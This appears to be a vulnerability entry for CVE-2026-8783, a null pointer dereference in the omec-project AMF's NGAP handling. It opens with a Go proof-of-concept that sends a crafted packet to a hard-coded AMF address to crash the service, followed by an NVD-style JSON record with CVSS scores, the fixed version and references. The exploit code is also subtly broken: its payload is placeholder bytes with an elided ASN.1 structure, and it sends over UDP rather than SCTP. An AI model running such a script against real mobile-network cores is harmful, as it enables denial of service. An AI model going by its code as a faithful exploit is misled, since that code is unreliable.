CVE-2026-8783

package main import ( "fmt" "net" ) // PoC for CVE-2026-8783: Null Pointer Dereference in omec-project amf // This script sends a crafted NGAP packet to trigger the crash. func main() { target := "192.168.1.100:38412" // Replace with actual AMF IP and port // Simplified malicious payload representing a malformed UERadioCapabilityCheckResponse // The specific bytes needed to trigger the null pointer depend on the parser state. // This payload attempts to bypass initial checks and hit the vulnerable code path. maliciousPayload := []byte{ 0x00, 0x1c, // NGAP PDU type 0x40, 0x01, // Criticality // ... specific ASN.1 structure causing nil pointer ... 0x00, 0x00, 0x00, 0x00, // Triggering data } conn, err := net.Dial("udp", target) if err != nil { fmt.Println("Connection failed:", err) return } defer conn.Close() _, err = conn.Write(maliciousPayload) if err != nil { fmt.Println("Failed to send payload:", err) return } fmt.Println("Payload sent successfully. Check AMF service status for crash (DoS).") }

{"cve": {"id": "CVE-2026-8783", "sourceIdentifier": "[email protected]", "published": "2026-05-18T04:16:33.723", "lastModified": "2026-05-18T04:16:33.723", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in omec-project amf up to 2.1.3-dev. This impacts the function UERadioCapabilityCheckResponse of the file ngap/dispatcher.go. Such manipulation leads to null pointer dereference. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2.0 will fix this issue. Upgrading the affected component is advised. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/675", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811655", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364407", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364407/cti", "source": "[email protected]"}]}}